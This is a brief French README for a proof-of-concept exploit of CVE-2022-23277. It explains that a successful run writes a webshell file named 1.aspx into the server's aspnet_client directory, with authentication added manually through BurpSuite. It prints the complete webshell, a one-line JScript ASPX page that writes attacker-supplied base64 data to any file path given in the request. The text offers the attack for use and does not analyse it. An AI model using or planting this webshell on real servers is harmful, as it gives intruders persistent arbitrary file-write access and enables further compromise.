
CVE-2022-23277 POC pour écrire un webshell dans aspnet_client
La partie authentification doit être ajoutée manuellement via BurpSuite. Après une exploitation réussie, un fichier 1.aspx sera écrit dans aspnet_client.
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
Pour plus de détails sur l'exploitation, veuillez vous référer à notre article.
